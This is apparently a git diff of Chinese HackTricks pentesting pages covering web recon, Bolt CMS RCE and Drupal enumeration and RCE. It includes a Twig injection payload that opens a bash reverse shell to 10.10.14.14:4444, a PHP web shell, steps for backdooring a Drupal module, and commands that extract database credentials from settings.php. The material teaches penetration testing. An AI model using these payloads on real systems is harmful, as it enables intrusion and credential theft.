* _Arjun所有默认字典:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
* _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)
* _Assetnote “parameters\_top\_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io)
* _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)
* **评论:** 检查所有文件的评论,您可以找到**凭据**或**隐藏功能**。
* 如果您在**CTF**中,"常见"的技巧是**隐藏****信息**在页面的**右侧**的评论中(使用**数百个**空格,以便在使用浏览器打开源代码时看不到数据)。另一种可能性是在网页的**底部**使用**多个新行**并在评论中**隐藏信息**。
* **API密钥**: 如果您**找到任何API密钥**,有一个指南指示如何使用不同平台的API密钥[**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](https://github.com/l4yton/RegHex\)/)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
* Google API密钥: 如果您找到任何看起来像**AIza**SyA-qLheq6xjDiEIRisP\_ujUseYLQCHUjik的API密钥您可以使用项目[**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner)来检查密钥可以访问哪些API。
* **S3存储桶**: 在爬虫时查看是否有任何**子域**或任何**链接**与某些**S3存储桶**相关。在这种情况下,[**检查**存储桶的**权限**](buckets/)。
### 特殊发现
**在**执行**爬行**和**暴力破解**时,您可能会发现一些**有趣的** **事情**,您需要**注意**。
**在**执行**爬虫**和**暴力破解**时,您可能会发现**有趣的** **事物**,您需要**注意**。
**有趣的文件**
* 查找**CSS**文件中指向其他文件的**链接**。
* [如果找到一个 _**.git**_ 文件,可以提取一些信息](git.md)
* 如果找到一个 _**.env**_ 文件,可能会发现诸如API密钥、数据库密码和其他信息。
* 如果找到**API端点**,您[也应该测试它们](web-api-pentesting.md)。这些不是文件,但可能“看起来像”它们。
* **JS文件**在爬行部分提到了几个可以从JS文件中提取路径的工具。此外**监视每个找到的JS文件**也很有趣,因为在某些情况下,更改可能表明代码中引入了潜在的漏洞。例如,您可以使用[**JSMon**](https://github.com/robre/jsmon)。
* 您还应该使用[**RetireJS**](https://github.com/retirejs/retire.js/)或[**JSHole**](https://github.com/callforpapers-source/jshole)检查发现的JS文件是否存在漏洞。
* **Javascript反混淆器和解包器**[https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/)[https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
* **Javascript美化器**[http://jsbeautifier.org/](https://beautifier.io)[http://jsnice.org/](http://jsnice.org)
* **JsFuck反混淆**(包含字符:“\[]!+” [https://ooze.ninja/javascript/poisonjs/](https://ooze.ninja/javascript/poisonjs/))
* [**TrainFuck**](https://github.com/taco-c/trainfuck)**** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
* 在许多情况下,您将需要**理解**使用的**正则表达式**,这将很有用:[https://regex101.com/](https://regex101.com)
* 您还可以**监视检测到表单的文件**,因为参数的更改或新表单的出现可能表明存在潜在的新易受攻击的功能。
* [如果找到一个_**.git**_文件可以提取一些信息](git.md)
* 如果您找到一个_**.env**_可以找到API密钥、数据库密码和其他信息。
* 如果找到**API端点**,您[也应该测试它们](web-api-pentesting.md)。这些不是文件,但可能“看起来像”它们。
* **JS文件**: 在爬虫部分提到了一些可以从JS文件中提取路径的工具。此外监控每个找到的JS文件也很有趣因为在某些情况下变化可能表明代码中引入了潜在的漏洞。您可以使用例如[**JSMon**](https://github.com/robre/jsmon)**.**
* 您还应该使用[**RetireJS**](https://github.com/retirejs/retire.js/)或[**JSHole**](https://github.com/callforpapers-source/jshole)检查发现的JS文件,以查找是否存在漏洞。
* **JavaScript去混淆和解包器:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
* **JavaScript美化器:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org)
* **JsFuck去混淆** (javascript with chars:"\[]!+" [https://ooze.ninja/javascript/poisonjs/](https://ooze.ninja/javascript/poisonjs/))
* [**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
* 在多个场合,您需要**理解使用的正则表达式**,这将很有用: [https://regex101.com/](https://regex101.com)
* 您还可以**监控检测到表单的文件**,因为参数的变化或新表单的出现可能表明潜在的新漏洞功能。
**403 Forbidden/基本身份验证/401未经授权绕过**
**403 Forbidden/Basic Authentication/401 Unauthorized (绕过)**
{% content-ref url="403-and-401-bypasses.md" %}
[403-and-401-bypasses.md](403-and-401-bypasses.md)
{% endcontent-ref %}
**502代理错误**
**502 Proxy Error**
如果任何页面以该**代码**响应,那么可能是**代理配置不当**。**如果您发送类似以下的HTTP请求`GET https://google.com HTTP/1.1`**(带有主机头和其他常见头),**代理**将尝试**访问**_**google.com**_,这样您就会发现一个**SSRF**
如果任何页面**响应**该**代码**,它可能是一个**配置错误的代理**。**如果您发送HTTP请求`GET https://google.com HTTP/1.1`**(带有主机头和其他常见头),**代理**将尝试**访问**_**google.com**_ **,您将发现一个** SSRF
**NTLM身份验证 - 信息泄露**
**NTLM证 - 信息泄露**
如果运行身份验证的服务器是**Windows**,或者您发现一个要求您**凭证**的登录(并要求您提供**域**名称),您可以引发**信息泄露**。\
**发送**头`“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”`,由于**NTLM身份验证的工作方式**服务器将在“WWW-Authenticate”头部中回复内部信息IIS版本、Windows版本...。\
您可以使用**nmap插件**“_http-ntlm-info.nse_”来**自动化**这个过程。
如果运行的服务器要求身份验证是**Windows**或您发现一个登录要求您的**凭据**(并要求**域名**),您可以引发**信息泄露**。\
**发送**头:`“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”`,由于**NTLM认证的工作原理**服务器将响应内部信息IIS版本Windows版本...)在头部"WWW-Authenticate"中。\
您可以使用**nmap插件**"_http-ntlm-info.nse_"来**自动化**此过程。
**HTTP重定向CTF**
可以在**重定向**中**放置内容**。这些内容**不会显示给用户**(因为浏览器将执行重定向),但其中可能**隐藏**着一些内容。
可以在**重定向**中**放置内容**。这些内容**不会显示给用户**(因为浏览器将执行重定向),但其中可能**隐藏**某些内容。
### Web漏洞检查
现在已经执行了对Web应用程序的全面枚举是时候检查可能存在的许多漏洞了。您可以在这里找到检查清单:
现在已经对Web应用程序进行了全面的枚举是时候检查许多可能的漏洞。您可以在这里找到检查清单:
{% content-ref url="../../pentesting-web/web-vulnerabilities-methodology.md" %}
[web-vulnerabilities-methodology.md](../../pentesting-web/web-vulnerabilities-methodology.md)
{% endcontent-ref %}
在以下位置找到有关Web漏洞的更多信息
有关Web漏洞的更多信息,请访问
* [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)
* [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html)
* [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection)
### 监视页面更改
### 监控页面变化
您可以使用诸如[https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io)之类的工具来监视页面的修改,以防止可能插入漏洞。
您可以使用工具如[https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io)来监控页面的修改,这可能会插入漏洞。
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对**黑客职业**感兴趣,并想要攻破不可攻破的 - **我们正在招聘!**(需要流利的波兰语书面和口语表达能力)。
如果您对**黑客职业**和破解不可破解的东西感兴趣 - **我们正在招聘!** (_需要流利的波兰语书面和口语能力_).
{% embed url="https://www.stmcyber.com/careers" %}
@ -430,16 +432,17 @@ Name: Ffuf Vhost
Description: Simple Scan with Ffuf for discovering additional vhosts
Command: ffuf -w {Subdomain_List}:FUZZ -u {Web_Proto}://{Domain_Name} -H "Host:FUZZ.{Domain_Name}" -c -mc all {Ffuf_Filters}
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

46
network-services-pentesting/pentesting-web/bolt-cms.md
View file

@ -1,35 +1,51 @@
# Bolt CMS
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **在Twitter上** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## RCE
登录为管理员后(转到 /bot 以访问登录提示您可以在Bolt CMS中获得RCE
以管理员身份登录后(访问 /bot 以进入登录提示),您可以在 Bolt CMS 中获得 RCE
* 选择 `Configuration` -> `View Configuration` -> `Main Configuration`转到URL路径 `/bolt/file-edit/config?file=/bolt/config.yaml`
* 选择 `Configuration` -> `View Configuration` -> `Main Configuration`访问 URL 路径 `/bolt/file-edit/config?file=/bolt/config.yaml`
* 检查主题的值
<figure><img src="../../.gitbook/assets/image (771).png" alt=""><figcaption></figcaption></figure>
* 选择 `File management` -> `View & edit templates`
* 选择上一步中找到的主题基础(在这种情况下`base-2021`)并选择 `index.twig`
* 在我的情况下这在URL路径 /bolt/file-edit/themes?file=/base-2021/index.twig
* 通过[模板注入Twig](../../pentesting-web/ssti-server-side-template-injection/#twig-php)在此文件中设置您的有效载,例如:`{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
* 然后保存更改
* 选择在上一步中找到的主题基础(在此案例中`base-2021`)并选择 `index.twig`
* 在我的案例中,这在 URL 路径 /bolt/file-edit/themes?file=/base-2021/index.twig
* 通过 [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php) 在此文件中设置您的有效载,例如:`{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
* 保存更改
<figure><img src="../../.gitbook/assets/image (948).png" alt=""><figcaption></figcaption></figure>
* 在 `Maintenance` -> `Clear the cache` 中清除缓存
* 再次以普通用户身份访问页面,有效负载应该被执行
* 作为普通用户再次访问页面,负载应被执行
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

66
network-services-pentesting/pentesting-web/drupal/README.md
View file

@ -1,18 +1,19 @@
# Drupal
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -20,21 +21,21 @@
## 发现
* 检查**meta**
* 检查 **meta**
```bash
curl https://www.drupal.org/ | grep 'content="Drupal'
```
* **节点**: Drupal **使用节点索引其内容**。一个节点可以**包含任何内容**比如博客文章、投票、文章等。页面的URI通常采用`/node/<nodeid>`的形式
* **节点**: Drupal **使用节点索引其内容**。一个节点可以 **包含任何内容**,例如博客文章、投票、文章等。页面 URI 通常为 `/node/<nodeid>`
```bash
curl drupal-site.com/node/1
```
## 枚举
Drupal 默认支持**三种类型的用户**
Drupal 默认支持 **三种类型的用户**
1. **`管理员`**此用户对Drupal网站拥有完全控制权。
2. **`已验证用户`**这些用户可以登录网站,并根据其权限执行操作,如添加和编辑文章。
3. **`匿名用户`**:所有网站访问者都被指定为匿名用户。默认情况下,这些用户只能阅读帖子。
1. **`Administrator`**: 此用户对 Drupal 网站拥有完全控制权。
2. **`Authenticated User`**: 这些用户可以登录网站,并根据其权限执行添加和编辑文章等操作
3. **`Anonymous`**: 所有网站访问者被指定为匿名用户。默认情况下,这些用户仅被允许阅读帖子。
### 版本
@ -45,14 +46,14 @@ curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 ""
Drupal 7.57, 2018-02-21
```
{% hint style="info" %}
Drupal的新安装默认阻止访问`CHANGELOG.txt`和`README.txt`文件。
较新的 Drupal 安装默认阻止访问 `CHANGELOG.txt``README.txt` 文件。
{% endhint %}
### 用户名枚举
#### 注册
_/user/register_ 页面尝试创建一个用户名,如果该名称已被使用,系统会通知:
_/user/register_ 中尝试创建一个用户名,如果该名称已被占用,将会收到通知:
![](<../../../.gitbook/assets/image (328).png>)
@ -68,7 +69,7 @@ Drupal的新安装默认阻止访问`CHANGELOG.txt`和`README.txt`文件。
### 获取用户数量
访问 _/user/\<number>_ 您可以看现有用户的数量,例如在这种情况下是2因为 _/users/3_ 返回未找到错误:
访问 _/user/\<number>_ 您可以看现有用户的数量,在这种情况下是 2因为 _/users/3_ 返回未找到错误:
![](<../../../.gitbook/assets/image (333).png>)
@ -76,8 +77,8 @@ Drupal的新安装默认阻止访问`CHANGELOG.txt`和`README.txt`文件。
### 隐藏页面
**`/node/$` 进行模糊测试,其中 `$` 是一个数字**例如从1到500。\
您可能会发现**隐藏页面**(测试、开发),这些页面未被搜索引擎引用。
**模糊 `/node/$` 其中 `$` 是一个数字**(例如从 1 到 500。\
您可能会找到 **隐藏页面**(测试、开发),这些页面未被搜索引擎引用。
#### 已安装模块信息
```bash
@ -89,21 +90,21 @@ curl https://example.com/core/core.services.yml
# Download content from files exposed in the previous step
curl https://example.com/config/sync/swiftmailer.transport.yml
```
### 自动
### 自动
```bash
droopescan scan drupal -u http://drupal-site.local
```
## RCE
如果您可以访问Drupal Web控制台请检查以下选项以获得RCE
如果您可以访问Drupal web控制台请检查这些选项以获取RCE
{% content-ref url="drupal-rce.md" %}
[drupal-rce.md](drupal-rce.md)
{% endcontent-ref %}
## 后渗透
## Post Exploitation
### 读取 settings.php
### 读取settings.php
```
find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
```
@ -111,7 +112,7 @@ find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|
```
mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'
```
## 参考资料
## 参考
* [https://academy.hackthebox.com/module/113/section/1209](https://academy.hackthebox.com/module/113/section/1209)
@ -119,16 +120,17 @@ mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为英雄</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

136
network-services-pentesting/pentesting-web/drupal/drupal-rce.md
View file

@ -1,32 +1,33 @@
# Drupal 远程代码执行RCE
# Drupal RCE
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或**关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 使用 PHP 过滤器模块
{% hint style="warning" %}
Drupal 的旧版本 **8 版本之前)** 中,可以作为管理员登录并**启用 `PHP 过滤器` 模块**,该模块“允许评估嵌入的 PHP 代码/片段”。但是从 8 版本开始,此模块不再默认安装。
旧版本的 Drupal **(8 之前)**,可以以管理员身份登录并 **启用 `PHP filter` 模块**,该模块“允许嵌入的 PHP 代码/片段被评估。”但从版本 8 开始,该模块默认不安装。
{% endhint %}
您需要安装**插件 php**(访问 _/modules/php_ 并检查是否返回 **403**,如果是,则**存在**,如果**未找到**,则**插件 php 未安装**
您需要 **安装 php 插件**(通过访问 _/modules/php_ 检查,如果返回 **403**,则 **存在**,如果 **未找到**,则 **php 插件未安装**
转到 _Modules_ ->**检查**_PHP Filter_ -> _保存配置_
转到 _Modules_ -> (**检查**) _PHP Filter_ -> _保存配置_
![](<../../../.gitbook/assets/image (247) (1).png>)
然后点击 _Add content_ -> 选择 _Basic Page__Article -_> 在 _body_ 中编写 _php shellcode_ -> 在 _Text format_ 中选择 _PHP code_ -> 选择 _Preview_
然后点击 _添加内容_ -> 选择 _基本页面__文章_ -> 在正文中写入 _php shellcode_ -> 在 _文本格式_ 中选择 _PHP 代码_ -> 选择 _预览_
![](<../../../.gitbook/assets/image (338).png>)
@ -34,82 +35,82 @@
```bash
curl http://drupal-site.local/node/3
```
## 安装 PHP 过滤器模块
## 安装 PHP Filter 模块
{% hint style="warning" %}
在当前版本中,仅通过访问 Web 就无法安装插件。
在当前版本中,默认安装后仅通过访问网页不再可能安装插件。
{% endhint %}
**8版本**开始,默认情况下**不再安装**[**PHP 过滤器**](https://www.drupal.org/project/php/releases/8.x-1.1)**模块**。要利用此功能,我们需要**自行安装该模块**
版本 **8 开始,** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **模块不再默认安装**。要利用此功能,我们必须 **自己安装模块**
1. 从 Drupal 网站下载最新版本的模块
2. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
3. 下载后,转到**`管理`** > **`报告`** > **`可用更新`**。
4. 点击**`浏览`**,选择从我们下载到的目录中的文件,然后点击**`安装`**。
5. 安装完模块后,我们可以点击**`内容`**,然后**创建一个新的基本页面**,类似于我们在 Drupal 7 示例中所做的操作。再次确保从**`文本格式`下拉菜单中选择`PHP 代码`**
1. 从 Drupal 网站下载模块的最新版本。
1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
2. 下载完成后,转到 **`Administration`** > **`Reports`** > **`Available updates`**。
3. 点击 **`Browse`**,选择我们下载的文件所在目录中的文件,然后点击 **`Install`**。
4. 模块安装完成后,我们可以点击 **`Content`** 并 **创建一个新的基本页面**,类似于我们在 Drupal 7 示例中所做的。再次确保 **从 `Text format` 下拉菜单中选择 `PHP code`**
## 后门模块
{% hint style="warning" %}
在当前版本中,仅通过访问 Web 就无法安装插件。
在当前版本中,默认安装后仅通过访问网页不再可能安装插件。
{% endhint %}
可以通过**向现有模块添加 shell** 来创建后门模块。可以在 drupal.org 网站上找到模块。让我们选择一个模块,比如[CAPTCHA](https://www.drupal.org/project/captcha)。向下滚动并复制 tar.gz [档](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz)的链接。
后门模块可以通过 **向现有模块添加 shell** 来创建。模块可以在 drupal.org 网站上找到。我们选择一个模块,例如 [CAPTCHA](https://www.drupal.org/project/captcha)。向下滚动并复制 tar.gz [档](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz) 的链接。
* 下载档并提取其内容。
* 下载档并提取其内容。
```
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
```
* 创建一个包含以下内容的 **PHP Web Shell**
* 创建一个 **PHP web shell**,内容为
```php
<?php
system($_GET["cmd"]);
?>
```
